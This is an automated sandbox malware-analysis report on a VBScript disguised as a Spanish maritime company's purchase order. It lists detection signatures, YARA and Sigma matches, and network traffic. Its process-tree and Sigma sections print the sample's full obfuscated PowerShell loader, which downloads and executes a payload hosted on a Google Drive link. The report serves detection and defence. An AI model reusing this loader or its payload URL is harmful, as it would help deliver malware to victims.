Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs

Overview

General Information

Sample name:BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
renamed because original name is a hash value
Original sample name:BOLUDA CORPORACIN MARTIMA, S.L. PEDIDO 268e44.vbs
Analysis ID:1540405
MD5:7b8f65c95deba3838f09c3c5e8f06c0c
SHA1:23f1d2f39788402c16ba1f5d6932eb4bef6df983
SHA256:da852e6aeab8c6422eecc57d741aae2a49abd26ee2d29185c0fa8f898f4bdf71
Tags:vbsuser-malwarelabnet
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5848 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11 'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl ');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[ Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e ';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous (Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11 'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne- Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous (Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC ,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') ;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous (Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola 1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous (Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous (Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo =Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto ');Semicalcareous $Antegningerne;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 432JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 432INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xb62e8:$b2: ::FromBase64String(
    • 0xb6325:$b2: ::FromBase64String(
    • 0xb6363:$b2: ::FromBase64String(
    • 0xb63a2:$b2: ::FromBase64String(
    • 0xb63e2:$b2: ::FromBase64String(
    • 0xb6423:$b2: ::FromBase64String(
    • 0xb6465:$b2: ::FromBase64String(
    • 0xb64a8:$b2: ::FromBase64String(
    • 0xb64ec:$b2: ::FromBase64String(
    • 0xb6531:$b2: ::FromBase64String(
    • 0xb6577:$b2: ::FromBase64String(
    • 0xb65be:$b2: ::FromBase64String(
    • 0xb6606:$b2: ::FromBase64String(
    • 0xb664f:$b2: ::FromBase64String(
    • 0xb6699:$b2: ::FromBase64String(
    • 0xb66e4:$b2: ::FromBase64String(
    • 0xb67ea:$b2: ::FromBase64String(
    • 0x27382f:$b2: ::FromBase64String(
    • 0x2738c3:$b2: ::FromBase64String(
    • 0x273969:$b2: ::FromBase64String(
    • 0x274305:$b2: ::FromBase64String(
    SourceRuleDescriptionAuthorStrings
    amsi64_432.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      amsi64_432.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x10276:$b2: ::FromBase64String(
      • 0xd5d8:$s1: -join
      • 0x6d84:$s4: +=
      • 0x6e46:$s4: +=
      • 0xb06d:$s4: +=
      • 0xd18a:$s4: +=
      • 0xd474:$s4: +=
      • 0xd5ba:$s4: +=
      • 0xf972:$s4: +=
      • 0xf9f2:$s4: +=
      • 0xfab8:$s4: +=
      • 0xfb38:$s4: +=
      • 0xfd0e:$s4: +=
      • 0xfd92:$s4: +=
      • 0xde10:$e4: Get-WmiObject
      • 0xdfff:$e4: Get-Process
      • 0xe057:$e4: Start-Process

      System Summary

      barindex
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", CommandLine|base64offset|contains: <@, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", ProcessId: 5848, ProcessName: wscript.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", CommandLine|base64offset|contains: <@, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs", ProcessId: 5848, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCK
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbsReversingLabs: Detection: 31%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.0% probability
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.8:49705 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.8:49706 version: TLS 1.2
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B24BF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1679719190.000001E9B24E1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: pdblib.pdbXt source: powershell.exe, 00000002.00000002.1646651748.000001E9983A1000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdbP source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb#e source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      barindex
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy HTTP/1.1Host: drive.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPb
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googPzm
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99B9FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0DyP
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googhko
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A2DC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BACC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1TeJPltNtbJEIuRNZ9m2aUpCS0lWzq0Dy&export=download
      Source: powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.comD=620
      Source: powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
